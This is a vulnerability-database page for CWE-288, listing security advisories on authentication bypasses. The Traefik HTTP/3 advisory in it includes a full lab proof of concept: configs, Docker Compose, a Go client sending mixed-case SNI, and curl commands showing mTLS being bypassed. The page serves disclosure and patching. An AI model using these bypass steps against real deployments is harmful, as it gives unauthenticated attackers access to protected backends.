Common Weakness Enumeration

CWE-288

Allowed

Authentication Bypass Using an Alternate Path or Channel

Abstraction: Base · Status: Incomplete

The product requires authentication, but the product has an alternate path or channel that does not require authentication.

1072 vulnerabilities reference this CWE, most recent first.

GHSA-96PC-32H7-WJ35

Vulnerability from github – Published: 2025-03-19 12:30 – Updated: 2025-03-19 12:30
VLAI
Details

The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.0. This is due to the plugin not properly validating a user's identity prior to (1) performing a post-booking auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user's password, including administrators, and leverage that to gain access to their account.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-13442"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-19T12:15:13Z",
    "severity": "CRITICAL"
  },
  "details": "The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.0. This is due to the plugin not properly validating a user\u0027s identity prior to (1) performing a post-booking auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user\u0027s password, including administrators, and leverage that to gain access to their account.",
  "id": "GHSA-96pc-32h7-wj35",
  "modified": "2025-03-19T12:30:33Z",
  "published": "2025-03-19T12:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13442"
    },
    {
      "type": "WEB",
      "url": "https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/827b5482-cb42-4aaa-80b5-3d0143fcead8?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9879-4R59-96J2

Vulnerability from github – Published: 2025-04-05 21:30 – Updated: 2025-04-05 21:30
VLAI
Details

In Zammad 6.4.x before 6.4.2, an authenticated agent with knowledge base permissions was able to use the Zammad API to fetch knowledge base content that they have no permission for.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-32357"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-05T21:15:39Z",
    "severity": "MODERATE"
  },
  "details": "In Zammad 6.4.x before 6.4.2, an authenticated agent with knowledge base permissions was able to use the Zammad API to fetch knowledge base content that they have no permission for.",
  "id": "GHSA-9879-4r59-96j2",
  "modified": "2025-04-05T21:30:23Z",
  "published": "2025-04-05T21:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32357"
    },
    {
      "type": "WEB",
      "url": "https://zammad.com/en/advisories/zaa-2025-04"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-98C3-Q46G-62QH

Vulnerability from github – Published: 2025-03-14 12:32 – Updated: 2026-04-08 18:33
VLAI
Details

The Civi - Job Board & Freelance Marketplace WordPress Theme plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.1.4. This is due to a lack of user validation before changing a password. This makes it possible for unauthenticated attackers to change the password of arbitrary users, including administrators, if the attacker knows the username of the victim.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-13771"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-14T12:15:13Z",
    "severity": "CRITICAL"
  },
  "details": "The Civi - Job Board \u0026 Freelance Marketplace WordPress Theme plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.1.4. This is due to a lack of user validation before changing a password. This makes it possible for unauthenticated attackers to change the password of arbitrary users, including administrators, if the attacker knows the username of the victim.",
  "id": "GHSA-98c3-q46g-62qh",
  "modified": "2026-04-08T18:33:51Z",
  "published": "2025-03-14T12:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13771"
    },
    {
      "type": "WEB",
      "url": "https://themeforest.net/item/civi-job-board-wordpress-theme/42770817"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5ab2c74d-b83b-40ea-951c-83aeb76a7515?source=cve"
    },
    {
      "type": "WEB",
      "url": "http://localhost:1337/wp-content/themes/civi/includes/class-ajax.php#L715"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-98CX-X9CV-HFMJ

Vulnerability from github – Published: 2024-12-13 15:30 – Updated: 2026-04-01 18:32
VLAI
Details

Authentication Bypass Using an Alternate Path or Channel vulnerability in Codexpert, Inc CoSchool LMS allows Authentication Bypass.This issue affects CoSchool LMS: from n/a through 1.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-54296"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-13T15:15:33Z",
    "severity": "CRITICAL"
  },
  "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Codexpert, Inc CoSchool LMS allows Authentication Bypass.This issue affects CoSchool LMS: from n/a through 1.2.",
  "id": "GHSA-98cx-x9cv-hfmj",
  "modified": "2026-04-01T18:32:43Z",
  "published": "2024-12-13T15:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54296"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/coschool/vulnerability/wordpress-coschool-lms-plugin-1-2-account-takeover-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-98HM-C56G-VJQC

Vulnerability from github – Published: 2023-05-23 00:30 – Updated: 2024-04-04 04:17
VLAI
Details

A proprietary protocol for iBoot devices is used for control and keepalive commands. The function compares the username and password; it also contains the configuration data for the user specified. If the user does not exist, then it sends a value for username and password, which allows successful authentication for a connection.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-47311"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-05-22T23:15:09Z",
    "severity": "HIGH"
  },
  "details": "A proprietary protocol for iBoot devices is used for control and keepalive commands. The function compares the username and password; it also contains the configuration data for the user specified. If the user does not exist, then it sends a value for username and password, which allows successful authentication for a connection.",
  "id": "GHSA-98hm-c56g-vjqc",
  "modified": "2024-04-04T04:17:06Z",
  "published": "2023-05-23T00:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47311"
    },
    {
      "type": "WEB",
      "url": "https://dataprobe.com/support/iboot-pdu/local_upgrade_pdu_procedure.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-263-03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-98RG-4FMQ-FRPJ

Vulnerability from github – Published: 2023-05-18 03:30 – Updated: 2023-05-18 03:30
VLAI
Details

A vulnerability in the social login configuration option for the guest users of Cisco Business Wireless Access Points (APs) could allow an unauthenticated, adjacent attacker to bypass social login authentication. This vulnerability is due to a logic error with the social login implementation. An attacker could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to access the Guest Portal without authentication.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-20003"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-05-18T03:15:09Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the social login configuration option for the guest users of Cisco Business Wireless Access Points (APs) could allow an unauthenticated, adjacent attacker to bypass social login authentication. This vulnerability is due to a logic error with the social login implementation. An attacker could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to access the Guest Portal without authentication.",
  "id": "GHSA-98rg-4fmq-frpj",
  "modified": "2023-05-18T03:30:20Z",
  "published": "2023-05-18T03:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20003"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cbw-auth-bypass-ggnAfdZ"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9C75-X9M5-346W

Vulnerability from github – Published: 2025-06-26 18:31 – Updated: 2025-06-26 18:31
VLAI
Details

Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Enterprise MFA - TFA for Drupal allows Authentication Bypass.This issue affects Enterprise MFA - TFA for Drupal: from 0.0.0 before 4.8.0, from 5.2.0 before 5.2.1, from 0.0.0 before 5.0., from 0.0.0 before 5.1..

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-6675"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-26T14:15:34Z",
    "severity": "MODERATE"
  },
  "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Enterprise MFA - TFA for Drupal allows Authentication Bypass.This issue affects Enterprise MFA - TFA for Drupal: from 0.0.0 before 4.8.0, from 5.2.0 before 5.2.1, from 0.0.0 before 5.0.*, from 0.0.0 before 5.1.*.",
  "id": "GHSA-9c75-x9m5-346w",
  "modified": "2025-06-26T18:31:26Z",
  "published": "2025-06-26T18:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6675"
    },
    {
      "type": "WEB",
      "url": "https://www.drupal.org/sa-contrib-2025-082"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9CCR-8MMH-VX6X

Vulnerability from github – Published: 2026-01-10 00:30 – Updated: 2026-01-10 00:30
VLAI
Details

A logic issue was addressed with improved validation. This issue is fixed in iOS 26.2 and iPadOS 26.2. Restoring from a backup may prevent passcode from being required immediately after Face ID enrollment.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-46286"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-09T22:15:59Z",
    "severity": "MODERATE"
  },
  "details": "A logic issue was addressed with improved validation. This issue is fixed in iOS 26.2 and iPadOS 26.2. Restoring from a backup may prevent passcode from being required immediately after Face ID enrollment.",
  "id": "GHSA-9ccr-8mmh-vx6x",
  "modified": "2026-01-10T00:30:30Z",
  "published": "2026-01-10T00:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46286"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/125884"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9CR8-Q42Q-G8M7

Vulnerability from github – Published: 2026-06-16 21:04 – Updated: 2026-06-16 21:04
VLAI
Summary
Traefik: HTTP/3 mTLS bypass via exact SNI TLSOptions lookup for wildcard and mixed-case hosts
Details

Summary

There is a critical vulnerability in Traefik's HTTP/3 (QUIC) TLS configuration selection that allows unauthenticated clients to bypass router-specific mTLS enforcement. When HTTP/3 is enabled on an entrypoint, the TLS handshake selects the applicable TLS configuration through an exact, case-sensitive lookup on the SNI value, which fails to match wildcard host patterns (e.g., *.example.com) or case variants of the configured hostname. Because the handshake falls back to the default TLS configuration — which may not require client certificates — a client can complete the QUIC handshake without presenting a certificate, while the subsequent HTTP routing layer still dispatches the request to a backend protected by a router-specific mTLS policy. The issue affects deployments where HTTP/3 is enabled, a router uses a wildcard Host rule or case-insensitive hostname matching, a router-specific TLSOptions enforces client certificate authentication, and UDP access to the entrypoint is reachable by an attacker.

Patches

  • https://github.com/traefik/traefik/releases/tag/v3.7.3

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description ### Summary Traefik's HTTP/3 TLS configuration selection can ignore router-specific `TLSOptions` and allow unauthenticated clients to bypass mTLS. The QUIC/HTTP3 path resolves TLS configuration with `Router.GetTLSGetClientInfo()`, which performs a direct, case-sensitive map lookup on `hostHTTPTLSConfig[info.ServerName]`. This is inconsistent with the later HTTP host routing semantics, where the same request host can still match wildcard or case-insensitive `Host` rules after the HTTP/3 TLS handshake has already fallen back to the default TLS configuration. Two exploit paths are confirmed: 1. `Host("*.example.com")` with `tls.options=mtls`: HTTP/2 requires a client certificate, but HTTP/3 reaches the protected backend without one. 2. `Host("api.example.com")` with `tls.options=mtls`: HTTP/2 requires a client certificate, but HTTP/3 with mixed-case SNI/Host such as `API.EXAMPLE.COM` reaches the protected backend without one. Confirmed versions: - wildcard HTTP/3 bypass: `v3.7.0`, `v3.7.1` - exact-host mixed-case HTTP/3 bypass: `v3.6.17`, `v3.7.0`, `v3.7.1` ### Details HTTP/3 installs a QUIC TLS callback in `pkg/server/server_entrypoint_tcp_http3.go`:
h3.Server = &http3.Server{
    Addr:      config.GetAddress(),
    Port:      config.HTTP3.AdvertisedPort,
    Handler:   httpsServer.Server.(*http.Server).Handler,
    TLSConfig: &tls.Config{GetConfigForClient: h3.getGetConfigForClient},
}
The callback is wired to the TCP router's TLS selector:
func (e *http3server) Switch(rt *tcprouter.Router) {
    e.lock.Lock()
    defer e.lock.Unlock()

    e.getter = rt.GetTLSGetClientInfo()
}
The selector in `pkg/server/router/tcp/router.go` only performs an exact map lookup:
func (r *Router) GetTLSGetClientInfo() func(info *tls.ClientHelloInfo) (*tls.Config, error) {
    return func(info *tls.ClientHelloInfo) (*tls.Config, error) {
        if tlsConfig, ok := r.hostHTTPTLSConfig[info.ServerName]; ok {
            return tlsConfig, nil
        }

        return r.httpsTLSConfig, nil
    }
}
That creates two mismatches: - wildcard keys such as `*.example.com` are never matched for `api.example.com` - lower-case router keys such as `api.example.com` are not matched for mixed-case SNI such as `API.EXAMPLE.COM` On the later HTTP request path, the same host can still match wildcard or case-insensitive `Host` rules through the muxer. The HTTP/3 TLS handshake path falls back to the default TLS config before that routing decision happens. If the default TLS config does not require a client certificate, the QUIC handshake succeeds without mTLS, and the later HTTP router still routes to the protected backend. Preconditions: - HTTP/3 is enabled on the affected entrypoint. - A router-specific `TLSOptions` configuration enforces client certificate authentication. - The default/fallback TLS configuration does not require client certificates. - UDP access to the HTTP/3 entrypoint is reachable by the attacker. Minimal wildcard dynamic configuration:
http:
  routers:
    protected:
      rule: Host(`*.example.com`)
      service: protected
      tls:
        options: mtls

  services:
    protected:
      loadBalancer:
        servers:
          - url: http://protected:80

tls:
  certificates:
    - certFile: /certs/server.crt
      keyFile: /certs/server.key

  options:
    mtls:
      clientAuth:
        caFiles:
          - /certs/ca.crt
        clientAuthType: RequireAndVerifyClientCert
Minimal exact-host dynamic configuration:
http:
  routers:
    protected:
      rule: Host(`api.example.com`)
      service: protected
      tls:
        options: mtls

  services:
    protected:
      loadBalancer:
        servers:
          - url: http://protected:80

tls:
  certificates:
    - certFile: /certs/server.crt
      keyFile: /certs/server.key

  options:
    mtls:
      clientAuth:
        caFiles:
          - /certs/ca.crt
        clientAuthType: RequireAndVerifyClientCert
Minimal Docker Compose:
services:
  traefik:
    image: traefik:v3.7.1
    command:
      - --log.level=DEBUG
      - --entrypoints.websecure.address=:8443
      - --entrypoints.websecure.http3
      - --providers.file.filename=/etc/traefik/dynamic.yml
      - --providers.file.watch=false
    ports:
      - "8443:8443/tcp"
      - "8443:8443/udp"
    volumes:
      - ./dynamic.yml:/etc/traefik/dynamic.yml:ro
      - ./certs:/certs:ro
    depends_on:
      - protected

  protected:
    image: traefik/whoami:v1.11
    command:
      - --name=PROTECTED
Certificate generation:
rm -rf certs
mkdir -p certs

openssl req -x509 -newkey rsa:2048 -nodes -days 7   -keyout certs/ca.key   -out certs/ca.crt   -subj "/CN=traefik-poc-ca"

openssl req -newkey rsa:2048 -nodes   -keyout certs/server.key   -out certs/server.csr   -subj "/CN=api.example.com"   -addext "subjectAltName=DNS:api.example.com,DNS:*.example.com"

openssl x509 -req   -in certs/server.csr   -CA certs/ca.crt   -CAkey certs/ca.key   -CAcreateserial   -out certs/server.crt   -days 7   -sha256   -copy_extensions copyall
The mixed-case HTTP/3 client used for the exact-host case:
package main

import (
    "crypto/tls"
    "fmt"
    "io"
    "net/http"
    "os"
    "time"

    "github.com/quic-go/quic-go/http3"
)

func main() {
    serverName := os.Getenv("TLS_SERVER_NAME")
    if serverName == "" {
        serverName = "API.EXAMPLE.COM"
    }

    host := os.Getenv("HTTP_HOST")
    if host == "" {
        host = "API.EXAMPLE.COM"
    }

    tr := &http3.Transport{
        TLSClientConfig: &tls.Config{
            ServerName:         serverName,
            InsecureSkipVerify: true,
        },
    }
    defer tr.Close()

    client := &http.Client{Transport: tr, Timeout: 8 * time.Second}

    req, err := http.NewRequest(http.MethodGet, "https://127.0.0.1:8443/", nil)
    if err != nil {
        panic(err)
    }
    req.Host = host

    resp, err := client.Do(req)
    if err != nil {
        fmt.Fprintln(os.Stderr, err)
        os.Exit(1)
    }
    defer resp.Body.Close()

    fmt.Println(resp.Proto, resp.StatusCode)
    body, _ := io.ReadAll(resp.Body)
    fmt.Print(string(body))
}
### PoC Wildcard bypass: 1. Start Traefik with the wildcard dynamic configuration above. 2. Control over TCP/TLS:
curl --noproxy '*' --http2 -skv   --resolve api.example.com:8443:127.0.0.1   https://api.example.com:8443/
Observed result:
TLS alert ... certificate required
3. HTTP/3 bypass:
curl --noproxy '*' --http3-only -skv   --resolve api.example.com:8443:127.0.0.1   https://api.example.com:8443/
Observed result:
HTTP/3 200
Name: PROTECTED
Host: api.example.com:8443
Exact-host mixed-case bypass: 1. Start Traefik with the exact-host dynamic configuration above. 2. Control over TCP/TLS:
curl --noproxy '*' --http2 -skv   --resolve api.example.com:8443:127.0.0.1   https://api.example.com:8443/
Observed result:
TLS alert ... certificate required
3. Mixed-case HTTP/2 control:
curl --noproxy '*' --http2 -skv   --resolve API.EXAMPLE.COM:8443:127.0.0.1   https://API.EXAMPLE.COM:8443/
Observed result:
TLS alert ... certificate required
This control confirms that the bypass is specific to the HTTP/3 TLS configuration selection path in this test setup. The HTTP/2 request to the same mixed-case hostname still fails with `certificate required`. 4. HTTP/3 bypass with the same mixed-case hostname:
TLS_SERVER_NAME=API.EXAMPLE.COM HTTP_HOST=API.EXAMPLE.COM   go run ./h3-case-client.go
Observed result:
HTTP/3.0 200
Name: PROTECTED
Host: API.EXAMPLE.COM
Local regression tests used during validation:
go test ./pkg/server/router/tcp   -run 'TestGetTLSGetClientInfo_(WildcardCurrentBehavior|ExactHostCaseSensitivityCurrentBehavior)$'   -count=1
These tests were added locally during analysis to demonstrate the current behavior of `GetTLSGetClientInfo()`. They are not required to reproduce the issue; the Docker and `curl`/HTTP3 commands above are the end-to-end reproduction. Version matrix observed with Docker images:
wildcard H3 bypass: affected on v3.7.0 and v3.7.1
exact-case H3 bypass: affected on v3.6.17, v3.7.0, and v3.7.1
The wildcard case was tested on v3.7.x because wildcard `Host` / `HostSNI` matching and TLSOptions association for wildcard domains were introduced in v3.7.0. ### Impact Deployments that use router `TLSOptions` as an access-control boundary for HTTP/3 can expose protected backends without client authentication. The highest-impact case is mTLS: - normal HTTP/2/TCP access to the protected host requires a client certificate - HTTP/3 access to the same route falls back to the default TLS config - the request is then routed to the protected backend without satisfying the route's mTLS policy This can expose confidential data or privileged backend operations to unauthenticated network clients. The issue is especially severe because it does not require credentials, user interaction, or a prior foothold. Possible workarounds until a fix is available: - Disable HTTP/3 on entrypoints that rely on router-specific mTLS. - Enforce mTLS in the default TLS options as well, so fallback TLS configuration is not weaker than router-specific configuration. - Block UDP access to the HTTP/3 entrypoint. - Enforce client authentication at an additional layer behind Traefik.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.7.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "Traefik"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.7.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.11.50"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.7.34"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-53622"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T21:04:29Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThere is a critical vulnerability in Traefik\u0027s HTTP/3 (QUIC) TLS configuration selection that allows unauthenticated clients to bypass router-specific mTLS enforcement. When HTTP/3 is enabled on an entrypoint, the TLS handshake selects the applicable TLS configuration through an exact, case-sensitive lookup on the SNI value, which fails to match wildcard host patterns (e.g., `*.example.com`) or case variants of the configured hostname. Because the handshake falls back to the default TLS configuration \u2014 which may not require client certificates \u2014 a client can complete the QUIC handshake without presenting a certificate, while the subsequent HTTP routing layer still dispatches the request to a backend protected by a router-specific mTLS policy. The issue affects deployments where HTTP/3 is enabled, a router uses a wildcard `Host` rule or case-insensitive hostname matching, a router-specific `TLSOptions` enforces client certificate authentication, and UDP access to the entrypoint is reachable by an attacker.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v3.7.3\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n### Summary\n\nTraefik\u0027s HTTP/3 TLS configuration selection can ignore router-specific `TLSOptions` and allow unauthenticated clients to bypass mTLS. The QUIC/HTTP3 path resolves TLS configuration with `Router.GetTLSGetClientInfo()`, which performs a direct, case-sensitive map lookup on `hostHTTPTLSConfig[info.ServerName]`.\n\nThis is inconsistent with the later HTTP host routing semantics, where the same request host can still match wildcard or case-insensitive `Host` rules after the HTTP/3 TLS handshake has already fallen back to the default TLS configuration. Two exploit paths are confirmed:\n\n1. `Host(\"*.example.com\")` with `tls.options=mtls`: HTTP/2 requires a client certificate, but HTTP/3 reaches the protected backend without one.\n2. `Host(\"api.example.com\")` with `tls.options=mtls`: HTTP/2 requires a client certificate, but HTTP/3 with mixed-case SNI/Host such as `API.EXAMPLE.COM` reaches the protected backend without one.\n\nConfirmed versions:\n\n- wildcard HTTP/3 bypass: `v3.7.0`, `v3.7.1`\n- exact-host mixed-case HTTP/3 bypass: `v3.6.17`, `v3.7.0`, `v3.7.1`\n\n### Details\n\nHTTP/3 installs a QUIC TLS callback in `pkg/server/server_entrypoint_tcp_http3.go`:\n\n```go\nh3.Server = \u0026http3.Server{\n    Addr:      config.GetAddress(),\n    Port:      config.HTTP3.AdvertisedPort,\n    Handler:   httpsServer.Server.(*http.Server).Handler,\n    TLSConfig: \u0026tls.Config{GetConfigForClient: h3.getGetConfigForClient},\n}\n```\n\nThe callback is wired to the TCP router\u0027s TLS selector:\n\n```go\nfunc (e *http3server) Switch(rt *tcprouter.Router) {\n    e.lock.Lock()\n    defer e.lock.Unlock()\n\n    e.getter = rt.GetTLSGetClientInfo()\n}\n```\n\nThe selector in `pkg/server/router/tcp/router.go` only performs an exact map lookup:\n\n```go\nfunc (r *Router) GetTLSGetClientInfo() func(info *tls.ClientHelloInfo) (*tls.Config, error) {\n    return func(info *tls.ClientHelloInfo) (*tls.Config, error) {\n        if tlsConfig, ok := r.hostHTTPTLSConfig[info.ServerName]; ok {\n            return tlsConfig, nil\n        }\n\n        return r.httpsTLSConfig, nil\n    }\n}\n```\n\nThat creates two mismatches:\n\n- wildcard keys such as `*.example.com` are never matched for `api.example.com`\n- lower-case router keys such as `api.example.com` are not matched for mixed-case SNI such as `API.EXAMPLE.COM`\n\nOn the later HTTP request path, the same host can still match wildcard or case-insensitive `Host` rules through the muxer. The HTTP/3 TLS handshake path falls back to the default TLS config before that routing decision happens. If the default TLS config does not require a client certificate, the QUIC handshake succeeds without mTLS, and the later HTTP router still routes to the protected backend.\n\nPreconditions:\n\n- HTTP/3 is enabled on the affected entrypoint.\n- A router-specific `TLSOptions` configuration enforces client certificate authentication.\n- The default/fallback TLS configuration does not require client certificates.\n- UDP access to the HTTP/3 entrypoint is reachable by the attacker.\n\nMinimal wildcard dynamic configuration:\n\n```yaml\nhttp:\n  routers:\n    protected:\n      rule: Host(`*.example.com`)\n      service: protected\n      tls:\n        options: mtls\n\n  services:\n    protected:\n      loadBalancer:\n        servers:\n          - url: http://protected:80\n\ntls:\n  certificates:\n    - certFile: /certs/server.crt\n      keyFile: /certs/server.key\n\n  options:\n    mtls:\n      clientAuth:\n        caFiles:\n          - /certs/ca.crt\n        clientAuthType: RequireAndVerifyClientCert\n```\n\nMinimal exact-host dynamic configuration:\n\n```yaml\nhttp:\n  routers:\n    protected:\n      rule: Host(`api.example.com`)\n      service: protected\n      tls:\n        options: mtls\n\n  services:\n    protected:\n      loadBalancer:\n        servers:\n          - url: http://protected:80\n\ntls:\n  certificates:\n    - certFile: /certs/server.crt\n      keyFile: /certs/server.key\n\n  options:\n    mtls:\n      clientAuth:\n        caFiles:\n          - /certs/ca.crt\n        clientAuthType: RequireAndVerifyClientCert\n```\n\nMinimal Docker Compose:\n\n```yaml\nservices:\n  traefik:\n    image: traefik:v3.7.1\n    command:\n      - --log.level=DEBUG\n      - --entrypoints.websecure.address=:8443\n      - --entrypoints.websecure.http3\n      - --providers.file.filename=/etc/traefik/dynamic.yml\n      - --providers.file.watch=false\n    ports:\n      - \"8443:8443/tcp\"\n      - \"8443:8443/udp\"\n    volumes:\n      - ./dynamic.yml:/etc/traefik/dynamic.yml:ro\n      - ./certs:/certs:ro\n    depends_on:\n      - protected\n\n  protected:\n    image: traefik/whoami:v1.11\n    command:\n      - --name=PROTECTED\n```\n\nCertificate generation:\n\n```bash\nrm -rf certs\nmkdir -p certs\n\nopenssl req -x509 -newkey rsa:2048 -nodes -days 7   -keyout certs/ca.key   -out certs/ca.crt   -subj \"/CN=traefik-poc-ca\"\n\nopenssl req -newkey rsa:2048 -nodes   -keyout certs/server.key   -out certs/server.csr   -subj \"/CN=api.example.com\"   -addext \"subjectAltName=DNS:api.example.com,DNS:*.example.com\"\n\nopenssl x509 -req   -in certs/server.csr   -CA certs/ca.crt   -CAkey certs/ca.key   -CAcreateserial   -out certs/server.crt   -days 7   -sha256   -copy_extensions copyall\n```\n\nThe mixed-case HTTP/3 client used for the exact-host case:\n\n```go\npackage main\n\nimport (\n    \"crypto/tls\"\n    \"fmt\"\n    \"io\"\n    \"net/http\"\n    \"os\"\n    \"time\"\n\n    \"github.com/quic-go/quic-go/http3\"\n)\n\nfunc main() {\n    serverName := os.Getenv(\"TLS_SERVER_NAME\")\n    if serverName == \"\" {\n        serverName = \"API.EXAMPLE.COM\"\n    }\n\n    host := os.Getenv(\"HTTP_HOST\")\n    if host == \"\" {\n        host = \"API.EXAMPLE.COM\"\n    }\n\n    tr := \u0026http3.Transport{\n        TLSClientConfig: \u0026tls.Config{\n            ServerName:         serverName,\n            InsecureSkipVerify: true,\n        },\n    }\n    defer tr.Close()\n\n    client := \u0026http.Client{Transport: tr, Timeout: 8 * time.Second}\n\n    req, err := http.NewRequest(http.MethodGet, \"https://127.0.0.1:8443/\", nil)\n    if err != nil {\n        panic(err)\n    }\n    req.Host = host\n\n    resp, err := client.Do(req)\n    if err != nil {\n        fmt.Fprintln(os.Stderr, err)\n        os.Exit(1)\n    }\n    defer resp.Body.Close()\n\n    fmt.Println(resp.Proto, resp.StatusCode)\n    body, _ := io.ReadAll(resp.Body)\n    fmt.Print(string(body))\n}\n```\n\n### PoC\n\nWildcard bypass:\n\n1. Start Traefik with the wildcard dynamic configuration above.\n2. Control over TCP/TLS:\n\n```bash\ncurl --noproxy \u0027*\u0027 --http2 